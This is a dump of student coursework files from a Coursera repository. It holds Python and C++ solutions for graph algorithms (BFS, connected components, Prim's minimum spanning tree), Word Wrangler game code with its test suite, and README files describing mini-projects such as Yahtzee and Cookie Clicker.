without\n # the first word character\n else:\n first_char = word[0]\n rest_strings = gen_all_strings(word[1:])\n for string in list(rest_strings):\n string_lst = list(string)\n for str_idx in range(len(string)+1):\n string_lst.insert(str_idx, first_char)\n rest_strings += [\"\".join(string_lst)]\n string_lst.pop(str_idx)\n \n return rest_strings\n\n# Function to load words from a file\n\ndef load_words(filename):\n \"\"\"\n Load word list from the file named filename.\n\n Returns a list of strings.\n \"\"\"\n url = codeskulptor.file2url(filename)\n netfile = urllib2.urlopen(url)\n # the last character in the word is the newline\n # \"\\n\" which is not needed\n return [word[:-1] for word in netfile]\n\ndef run():\n \"\"\"\n Run game.\n \"\"\"\n words = load_words(WORDFILE)\n wrangler = provided.WordWrangler(words, remove_duplicates, \n intersect, merge_sort, \n gen_all_strings)\n provided.run_game(wrangler)\n\n# lauches the game\nrun()\n\n \n "
},
{
"alpha_fraction": 0.6569617390632629,
"alphanum_fraction": 0.6595444679260254,
"avg_line_length": 36.359649658203125,
"blob_id": "fe0f1484d7904cb0ff0b69e2253dedfe97c59344",
"content_id": "28e92d0851371832fe5f74792562225f4f350ab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4259,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 114,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/alg_project2_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFunctions for Project #2: \"Connected Components and Graph Resilience\". These \nfunctions will be used for the Application #2: \"Analysis of a Computer Network\"\n\"\"\"\nfrom collections import deque\nimport alg_application2_provided as alg_app2_prov\n\ndef bfs_visited(ugraph, start_node):\n \"\"\"\n Perfoms the Breath First Seach(BFS) and returns a set of all the nodes \n that are visited starting from start_node\n \n Arguments:\n ugraph {dictionary} -- an undirect graph\n start_node {integer} -- a node in the ugraph\n \n Returns:\n set -- a set of all nodes visited by a BFS that start at start_node\n \"\"\"\n # initialize an queue with the start_node. We use python's built in double\n # ended queue, deque\n deq = deque([start_node])\n # add the start node to the visited nodes set\n visited = set([start_node]) \n # keep traversing through all the neighbors of the nodes in the queue\n # as long as the queue is not empty and mark them as visited if the nodes\n # are not yet visited\n while len(deq) != 0:\n curr_node = deq.popleft()\n for neighbor in ugraph[curr_node]:\n if not (neighbor in visited):\n visited.add(neighbor)\n deq.append(neighbor)\n\n return visited\n\ndef cc_visited(ugraph):\n \"\"\"\n Takes an undirected graph ugraph and computes the all the\n connected components of the graph\n \n Arguments:\n ugraph {dictionary} -- an undirected graph\n \n Returns:\n list of sets -- resturns a list of sets where each set has all the nodes in\n a particular connected component of the graph, and each set\n represent a connect component of the graph\n \"\"\"\n # initialize the remaining nodes in the ugraph that have not yet been visited \n remain_nodes = set(ugraph.keys())\n # initiakize the list of sets where each set is a connected component of ugraph\n con_comp = []\n\n # use BFS to find all the connect components until all the nodes of the ugraph\n # have been visisted\n while len(remain_nodes) != 0:\n not_vis_node = remain_nodes.pop()\n visited = bfs_visited(ugraph, not_vis_node)\n con_comp.append(visited)\n remain_nodes -= visited\n\n return con_comp\n\ndef largest_cc_size(ugraph):\n \"\"\"\n Takes a undirected graph and returns the size of the largest connected component\n \n Arguments:\n ugraph {dictionary} -- an undirected graph\n \n Returns:\n integer -- the size of the largest connected component of ugraph\n \"\"\"\n # find the size of all the connect components of the ugraph\n len_cc = [len(con_comp) for con_comp in cc_visited(ugraph)]\n \n # make sure to take care of the case when ugraph is empty and we get\n # an empty len_cc list\n if (len(len_cc) == 0):\n return 0\n\n # return the max size of connected compo\n return max(len_cc)\n\ndef compute_resilience(ugraph, attack_order):\n \"\"\"\n Computes a measure of resilience of an undirected graph. Takes the undirected \n graph ugraph, a list of nodes attack_order and iterates through the nodes in \n attack_order. For each node in the list, the function removes the given node \n and its edges from the graph and then computes the size of the largest connected \n component for the resulting graph.\n \n Arguments:\n ugraph {dictionary} -- an undirected graph\n attack_order {list of nodes} -- list of nodes that will be iterated over\n \n Returns:\n list of integers -- return a list whose (k+1)th entry is the size of the largest \n connected component in the graph after the removal of the first \n k nodes in attack_order\n \"\"\"\n new_graph = alg_app2_prov.copy_graph(ugraph)\n\n # get the size of the largest connected component before removing any nodes\n lst_max_cc = [largest_cc_size(new_graph)]\n\n # start removing each node in the attack_order and its edges from the ugraph\n # and find the largest connected component after each removal \n for remove_node in attack_order:\n alg_app2_prov.delete_node(new_graph, remove_node)\n lst_max_cc.append(largest_cc_size(new_graph))\n\n return lst_max_cc\n"
},
{
"alpha_fraction": 0.7808939814567566,
"alphanum_fraction": 0.7905346155166626,
"avg_line_length": 174.38461303710938,
"blob_id": "8190217a925b764102e82f124a57fa9224f24145",
"content_id": "9bab4f2abba9884a090fda9531c53480174543ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2302,
"license_type": "no_license",
"max_line_length": 571,
"num_lines": 13,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project2 Guess the Number/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #2 - \"Guess the Number\"\n\nImplemented the basic guess the number game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_0pxZwPBcUh_7.py) and press the play button on the top left corner. A pop up window will appear and allow you to enter you guess. Game can be either played with numbers from 0 to 100 or from 0 to 1000.\n\nMini-project overview taken from course page can be found below:\n* One of the simplest two-player games is “Guess the number”. The first player thinks of a secret number in some known range while the second player attempts to guess the number. After each guess, the first player answers either “Higher”, “Lower” or “Correct!” depending on whether the secret number is higher, lower or equal to the guess. In this project, you will build a simple interactive program in Python where the computer will take the role of the first player while you play as the second player.\n\n* When discussing ranges in this mini-project, we will follow the standard Python convention of including the low end of the range and excluding the high end of the range. Mathematically, we will express ranges via the notation **[low,high)**. The square bracket of the left of the range indicates that the corresponding bound should be included. The left parenthesis on the right of the range indicates that corresponding bound should be excluded. For example, the range **[0,3)** consists of numbers starting at 0 up to, but not including 3. In other words 0, 1, and 2.\n\n* You will interact with your program using an input field and several buttons. For this project, we will ignore the canvas and print the computer's responses in the console. Building an initial version of your project that prints information in the console is a development strategy that you should use in later projects as well. Focusing on getting the logic of the program correct before trying to make it display the information in some “nice” way on the canvas usually saves lots of time since debugging logic errors in graphical output can be tricky.\n\nComplete Mini-Project Description can be found at: \n<https://www.coursera.org/learn/interactive-python-1/supplement/zrxfY/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.5747451782226562,
"alphanum_fraction": 0.5975840091705322,
"avg_line_length": 29.535715103149414,
"blob_id": "f4c2ecb6f2686d60d00e4adbc7aa5c2496385073",
"content_id": "e948d060a490f0c26c9599ebeaf3b413c9335445",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5310,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 168,
"path": "/Algorithms on Graphs/Assignment5/connecting_points.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: connecting_points.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-24\r\n// description: Problem 1 of the fifth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given n points on a plane, connect them with segments of minimum total length \r\n//\t\t\t\tsuch that there is a path between any two points.\r\n//\r\n//\t\t\t\tInput Format. The first line contains the number n of points. Each of the following n lines \r\n//\t\t\t\tdefines a point (xi, yi).\r\n//\r\n//\t\t\t\tOutput: Output the minimum total length of segments. The absolute value of the difference\r\n//\t\t\t\tbetween the answer of this program and the optimal value is at most 10e−6\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tminimum_distance function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 8.7/512 MB. \r\n\r\n\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <iomanip>\r\n#include <vector>\r\n#include <cmath>\r\n#include <queue>\r\n#include <limits>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\n\r\n// Used for creating a min priority queue i.e the top of the queue will contain\r\n// the smallest element.\r\n\r\nstruct pri\r\n{\r\n\tint operator() (const pair<int, double>&p1, const pair<int, double>&p2)\r\n\t{\r\n\t\treturn (p1.second > p2.second);\r\n\t}\r\n};\r\n\r\n// Uses Prim's algorithm to find the optimal way to connects given points\r\n// \r\n// PRE: 1 ≤ n ≤ 200; 10e-3 ≤ xi,yi ≤ 10e3 are all integers; All points (xi, yi) are pairwise different, no three\r\n//\t\tpoints lie on the same line (not xi and yi is ths same as value at x[i] and y[i], x.size() = y.size = n) \r\n// POST: return the minimum total length of segments (in other word the optimal way to connect all given points )\r\n// PARAM: x = vector with all the x cordinate values of the points\r\n//\t\t y = vector with all the y cordinate values of the points\r\n\r\ndouble minimum_distance(vector<int> x, vector<int> y) {\r\n\r\n\t//create a min priporty queue of pairs of int and double. Int represents teh \r\n\tstd::priority_queue<int, std::vector< pair<int, double> >, pri > min_queue;\r\n\t// create a cost vector equal to x's size and intial values of inifinity i.e a large number for all indexes \r\n\tvector<double> cost(x.size(), std::numeric_limits<double>::max());\r\n\tcost[0] = 0.;\r\n\t//the edge weight\r\n\tdouble weight = 0.;\r\n\t//minimum distance i.e. lenght of the optimal way to connect given points\r\n\tdouble result = 0.;\r\n\tint v;\r\n\tint i = 0;\r\n\tvector<bool> visited(x.size(), false);\r\n\t\r\n\tmin_queue.push(std::make_pair(0, 0));\r\n\r\n\twhile (i < x.size()) {\r\n\t\t\r\n\t\t//get current index for the x and y coordinate of the point/vertice\r\n\t\tv = min_queue.top().first;\r\n\t\t//mark the index and inturn the point as visited\r\n\t\tvisited[v] = true;\r\n\t\t//add the cost of the current point to the result \r\n\t\tresult += cost[v];\r\n\t\tmin_queue.pop();\r\n\t\t\r\n\t\t/****\r\n\t\t//the whole for loop stores all the distance values from the current point to other ones in the min_queue (i.e \r\n\t\t//it stores the points in increasing order of their distance from the current point)\r\n\t\t****/\r\n\t\tfor (int z = 0; z < x.size(); ++z)\r\n\t\t{\r\n\t\t\t//if point at index z is not visited\r\n\t\t\tif (visited[z] == false) {\r\n\t\t\t\t//find the distance from current point at index v to point at index z and store is as the edge weight\r\n\t\t\t\tweight = sqrt(pow((x[v] - x[z]), 2) + pow((y[v] - y[z]), 2));\r\n\t\t\t\t//if the cost of reaching the next vertice from current one is greater than the edge weight,\r\n\t\t\t\tif (cost[z] > weight) {\r\n\t\t\t\t\t//update cost of the next vertice \r\n\t\t\t\t\tcost[z] = weight;\r\n\t\t\t\t\t//push it on the queue\r\n\t\t\t\t\tmin_queue.push(std::make_pair(z, cost[z]));\r\n\t\t\t\t}\r\n\r\n\t\t\t}\r\n\t\t\t//this is used to remove the duplicates pushed onto the queue i.e. prevent storing the points and their costs that have\r\n\t\t\t//already been visited \r\n\t\t\telse if (min_queue.size() != 0) {\r\n\t\t\t\twhile (!min_queue.empty() && visited[min_queue.top().first] == true ) {\r\n\t\t\t\t\tmin_queue.pop();\r\n\t\t\t\t}\r\n\r\n\t\t\t}\r\n\r\n\t\t\t\r\n\t\t}\t\r\n\t\t++i;\r\n\t}\r\n\t\r\n\treturn result;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n;\r\n\tstd::cin >> n;\r\n\tvector<int> x(n), y(n);\r\n\tfor (size_t i = 0; i < n; i++) {\r\n\t\tstd::cin >> x[i] >> y[i];\r\n\t}\r\n\tstd::cout << std::setprecision(10) << minimum_distance(x, y) << std::endl;\r\n\r\n\t\r\n\t\r\n\t// A test case to check if the minimum_distance function works. These are commented since the \r\n\t// assignment requires the connecting_points.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/************************************************************************************************************\r\n\tvector<int> x1(4), y1(4);\r\n\tx1[0] = 0;\r\n\ty1[0] = 0;\r\n\r\n\tx1[1] = 0;\r\n\ty1[1] = 1;\r\n\r\n\tx1[2] = 1;\r\n\ty1[2] = 0;\r\n\r\n\tx1[3] = 1;\r\n\ty1[3] = 1;\r\n\r\n\tstd::cout << std::setprecision(10) << minimum_distance(x1, y1) << std::endl;\r\n\r\n\tvector<int> x2(5), y2(5);\r\n\tx2[0] = 0;\r\n\ty2[0] = 0;\r\n\r\n\tx2[1] = 0;\r\n\ty2[1] = 2;\r\n\r\n\tx2[2] = 1;\r\n\ty2[2] = 1;\r\n\r\n\tx2[3] = 3;\r\n\ty2[3] = 0;\r\n\r\n\tx2[4] = 3;\r\n\ty2[4] = 2;\r\n\r\n\tstd::cout << std::setprecision(10) << minimum_distance(x2, y2) << std::endl;\r\n\r\n\t********************************************************************************************************/\r\n}\r\n"
},
{
"alpha_fraction": 0.7632075548171997,
"alphanum_fraction": 0.7745283246040344,
"avg_line_length": 104.9000015258789,
"blob_id": "2d638e868bd3e4a83c8541ab8a4d0f80ab6036ff",
"content_id": "4b973fe20364b97574163bed0be39f890787b135",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2120,
"license_type": "no_license",
"max_line_length": 635,
"num_lines": 20,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project4 Game Yahtzee/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #4 - Yahtzee\n\nImplemented the game strategy logic for a simplified version of the game Yahtzee in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. \n\nLink to my solution:\n<http://www.codeskulptor.org/#user46_a5e527xGfZ_58.py>\n\nLink to the test suite for my solution: \n<http://www.codeskulptor.org/#user46_i4ScIuelhi_93.py>\n\nMini-project overview taken from course page can be found below:\n* [Yahtzee](https://en.wikipedia.org/wiki/Yahtzee) is a dice game played with 5 dice where you try to score the most points by matching certain combinations. You can play the game [here](https://cardgames.io/yahtzee/). In Yahtzee, you get to roll the dice three times on each turn. After the first roll, you may hold as many dice as you would like and roll the remaining free dice. After this second roll, you may again hold as many dice as you would like and roll the rest. Once you stop (either because you have exhausted your three rolls or you are satisfied with the dice you have), you score the dice in one box on the score card.\n\n* For this mini-project, we will implement a strategy function designed to help you choose which dice to hold after your second roll during the first turn of a game of Yahtzee. This function will consider all possible choices of dice to hold and recommend the choice that maximizes the expected value of your score after the final roll.\n\n* To simplify the mini-project, we will only consider scores corresponding to the \"upper\" section of the scorecard. Boxes in the upper section correspond to numbers on the dice. After each turn, you may choose one empty box and enter the sum of the dice you have with the corresponding number. For example, if you rolled **(2, 3, 3, 3, 4)**, you could score **2** in the Twos box, **9** in the Threes box, or **4** in the Fours box. (Restricting scoring to the upper section will also allow you to debug/test your strategy function on smaller numbers of dice.)\n\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/MWNxX/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.5138125419616699,
"alphanum_fraction": 0.5486472845077515,
"avg_line_length": 39.83964920043945,
"blob_id": "8a9ccd7d7481e39f088442b5648fa28a210c16ff",
"content_id": "70802364497498b5ff88e95c10343b5c980ac6aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14009,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 343,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project2 Word Wrangler/word_wrangler_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in one implementation\nof word wrangler game\n\"\"\"\n\nimport poc_simpletest as simpletest\nimport user46_5gpKzUvHYk_75 as wrangler\n\nclass TestWordWangler():\n \"\"\"\n function that tests the remove_duplicate function\n of the word wrangler game mini-project\n \"\"\"\n def test_remove_duplicates(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running remove_duplicate function test...\"\n\n # Test #1.1: list is empty. Should return an empty list\n in_lst = []\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = []\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.1: remove_duplicates\")\n # Test #1.2: list has one element. Should return same list\n in_lst = [1]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [1]\n # run the Test #1.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.2: remove_duplicates\")\n # Test #1.3: list has all same elements. Should return list\n # of length 1\n in_lst = [2, 2, 2]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [2]\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.3: remove_duplicates\")\n # Test #1.4: list has all same elements at the end of the\n # list\n in_lst = [1, 2, 3, 3, 3]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [1, 2, 3]\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.4: remove_duplicates\")\n \n # Test #1.5: list has some duplicates at the beginning \n # of the list\n in_lst = [0, 0, 1, 3, 3, 7]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [0, 1, 3, 7]\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.5: remove_duplicates\")\n \n # Test #1.6: list has mulitple duplicates\n in_lst = [0, 0, 1, 3, 3, 7, 8, 8, 15, 15, 15, 15, 21]\n out_lst_actual = wrangler.remove_duplicates(in_lst)\n out_lst_exp = [0, 1, 3, 7, 8, 15, 21]\n # run the Test #1.6 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #1.6: remove_duplicates\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \"\"\"\n function that tests the interesct function\n of the word wrangler game mini-project\n \"\"\"\n def test_intersect(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running intersect function test...\"\n\n # Test #2.1: input lists are empty. Should return \n # an empty list\n in_lst1 = []\n in_lst2 = []\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = []\n # run the Test #2.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.1: intersect\")\n \n # Test #2.2: both input list have one elements with no\n # common value\n # an empty list\n in_lst1 = [1]\n in_lst2 = [2]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = []\n # run the Test #2.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.2: intersect\")\n \n # Test #2.3: both input list have one elements with of same value\n # an empty list\n in_lst1 = [1]\n in_lst2 = [1]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [1]\n # run the Test #2.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.3: intersect\")\n \n \n # Test #2.4: both input list have multiple elements\n # with one common value\n in_lst1 = [1, 2, 10, 15]\n in_lst2 = [4, 7, 10]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [10]\n # run the Test #2.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.4: intersect\")\n \n # Test #2.5: one input list is a subset of the other list\n in_lst1 = [1, 2, 10, 15, 30]\n in_lst2 = [2, 10, 15]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [2, 10, 15]\n # run the Test #2.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.5: intersect\")\n \n # Test #2.6: some random input list combination\n in_lst1 = [1, 2, 10, 15, 30, 33, 40, 100, 200, 300]\n in_lst2 = [2, 10, 15, 17, 19, 300]\n out_lst_actual = wrangler.intersect(in_lst1, in_lst2)\n out_lst_exp = [2, 10, 15, 300]\n # run the Test #2.6 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #2.6: intersect\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \n \"\"\"\n function that tests the merge function\n of the word wrangler game mini-project\n \"\"\"\n def test_merge(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running merge function test...\"\n\n # Test #3.1: both input lists are empty. Should return \n # an empty list\n in_lst1 = []\n in_lst2 = []\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = []\n # run the Test #3.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.1: merge\")\n # Test #3.2: first list is empty and while second has\n # one element\n in_lst1 = []\n in_lst2 = [1]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [1]\n # run the Test #3.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.2: merge\")\n # Test #3.3: first list has one element while second\n # is empty\n # of length 1\n in_lst1 = [2]\n in_lst2 = []\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [2]\n # run the Test #3.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.3: merge\")\n # Test #3.4: both lists are equal i.e have same\n # elements\n in_lst1 = [1, 2, 3]\n in_lst2 = [1, 2, 3]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [1, 1, 2, 2, 3, 3]\n # run the Test #3.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.4: merge\")\n \n # Test #3.5: first list has more elements than second list\n # with some duplicates\n in_lst1 = [0, 0, 1, 3]\n in_lst2 = [0, 5, 10]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [0, 0, 0, 1, 3, 5, 10]\n # run the Test #3.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.5: merge\")\n \n # Test #3.6: first list has less elements than second list\n in_lst1 = [5, 10]\n in_lst2 = [2, 5, 11, 40, 41, 50]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [2, 5, 5, 10, 11, 40, 41, 50]\n # run the Test #3.6 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.6: merge\")\n \n # Test #3.7: some random combination\n in_lst1 = [11, 12, 15, 15, 15]\n in_lst2 = [2, 15, 15, 30]\n out_lst_actual = wrangler.merge(in_lst1, in_lst2)\n out_lst_exp = [2, 11, 12, 15, 15, 15, 15, 15, 30]\n # run the Test #3.7 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #3.7: merge\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \"\"\"\n function that tests the merge_sort function\n of the word wrangler game mini-project\n \"\"\"\n def test_merge_sort(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running merge_sort function test...\"\n\n # Test #4.1: input list is empty. Should return an empty list\n in_lst = []\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = []\n # run the Test #4.1 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.1: merge_sort\")\n # Test #4.2: input list has one element. Should return same list\n in_lst = [1]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [1]\n # run the Test #4.2 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.2: merge_sort\")\n # Test #4.3: input list has all same elements. Should return the\n # list in same order as input list\n in_lst = [1, 1, 1]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [1, 1, 1]\n # run the Test #4.3 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.3: merge_sort\")\n # Test #4.4: input list is in descending order. Should\n # return list in ascending order\n in_lst = [11, 5, 3, 2, 2]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [2, 2, 3, 5, 11]\n # run the Test #4.4 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.4: merge_sort\")\n \n # Test #4.5: input list is randomly unordered. Should\n # return a list in ascending order\n in_lst = [1, 11, 2, 6, 3, 0, -1, 100]\n out_lst_actual = wrangler.merge_sort(in_lst)\n out_lst_exp = [-1, 0, 1, 2, 3, 6, 11, 100]\n # run the Test #4.5 and compare the expected vs actual output\n suite.run_test(str(out_lst_actual), str(out_lst_exp), \n \"Test #4.5: merge_sort\")\n\n # report number of tests and failures\n suite.report_results()\n print \n \n \"\"\"\n helper function to check if all elements of the\n list are same\n \"\"\"\n \n \"\"\"\n function that tests gen_all_strings function\n of the word wrangler game mini-project\n \"\"\"\n def test_gen_all_strings(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running gen_all_strings function test...\"\n\n # Test #5.1: input string is empty. Should return empty string\n in_string = \"\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = [\"\"]\n # run the Test #5.1 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.1: gen_all_strings\")\n # Test #5.2: input string has one element. \n in_string = \"a\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = [\"\", \"a\"]\n # run the Test #5.2 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.2: gen_all_strings\") \n # Test #5.3: input string has distinct characters. \n in_string = \"abc\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = ['', 'c', 'b', 'bc', 'cb', 'a', 'ac', 'ca', \n 'ab', 'ba', 'abc', 'bac', 'bca', 'acb', \n 'cab', 'cba']\n # run the Test #5.3 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.3: gen_all_strings\")\n # Test #5.4: input string has duplicate characters. \n in_string = \"aab\"\n out_str_lst_actual = wrangler.gen_all_strings(in_string)\n out_str_lst_exp = ['', 'b', 'a', 'ab', 'ba', 'a', 'ab', 'ba',\n 'aa', 'aa', 'aab', 'aab', 'aba', 'aba', \n 'baa', 'baa']\n # run the Test #5.4 and compare the expected vs actual output\n suite.run_test(str(out_str_lst_actual), str(out_str_lst_exp), \n \"Test #5.4: gen_all_strings\") \n \n # report number of tests and failures\n suite.report_results()\n print \n \n \n# test all functions of the word wangler pini-project\nword_wangler = TestWordWangler()\nword_wangler.test_remove_duplicates()\nword_wangler.test_intersect()\nword_wangler.test_merge()\nword_wangler.test_merge_sort()\nword_wangler.test_gen_all_strings()\n\n"
},
{
"alpha_fraction": 0.79200279712677,
"alphanum_fraction": 0.7972640991210938,
"avg_line_length": 157.38888549804688,
"blob_id": "4ca8bd6d91090fb56d7ca068dc5c80c9355aaa59",
"content_id": "add25e69c33e380f0bc8ec6e4d0593f7efca3c3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2851,
"license_type": "no_license",
"max_line_length": 722,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project5 Cookie Clicker/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #5 - Cookie Clicker\n\nImplemented a simplified simulation and various strategy functions for Cookie Clicker game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. \n\nLink to my solution:\n<http://www.codeskulptor.org/#user46_AZ0kaH7baf_105.py>\n\nMini-project overview taken from course page can be found below:\n* Cookie Clicker is a game built around a simulation in which your goal is to bake as many cookies as fast as possible. The main strategy component of the game is choosing how to allocate the cookies that you have produced to upgrade your ability to produce even more cookies faster. You can play Cookie Clicker [here](http://orteil.dashnet.org/cookieclicker/). Before you start work on this mini-project, we strongly recommend that you complete the Practice Activity, [\"The Case of the Greedy Boss\"](https://www.coursera.org/learn/principles-of-computing-1/supplement/b8bvB/practice-activity-the-case-of-the-greedy-boss), which is designed to walk you through the steps of building a simulation similar to Cookie Clicker.\n\n* In Cookie Clicker, you have many options for upgrading your ability to produce cookies. Originally, you can only produce cookies by clicking your mouse. However, you can use the cookies you earn to buy other methods of producing cookies (Grandmas, farms, factories, etc.). Each production method increases the number of \"cookies per second\" (CPS) you produce. Further, each time you buy one of the production methods, its price goes up. So, you must carefully consider the cost and benefits of purchasing a production method, and the trade-offs change as the game goes on.\n\n* For this assignment, you will implement a simplified simulation of the Cookie Clicker game. You will implement different strategies and see how they fare over a given period of time. In our version of the game, there is no graphical interface and therefore no actual \"clicking\". Instead, you will start with a CPS of 1.0 and may start purchasing automatic production methods once you have enough cookies to do so. You will implement both the simulation engine for the game and your own strategies for selecting what production methods to buy.\n\n* We have provided the following [template](http://www.codeskulptor.org/#poc_clicker_template.py) that contains an outline of the code you will write, including a **ClickerState** class, which will keep track of the state of the simulation, and a **simulate_clicker** function, which will run the simulation. The signature (name and parameters) of the functions, classes, and methods in this file must remain unchanged, but you may add any additional functions, methods, or other code that you need to.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/b3ZG8/mini-project-description>\n"
},
{
"alpha_fraction": 0.5621954202651978,
"alphanum_fraction": 0.5880995392799377,
"avg_line_length": 29.44354820251465,
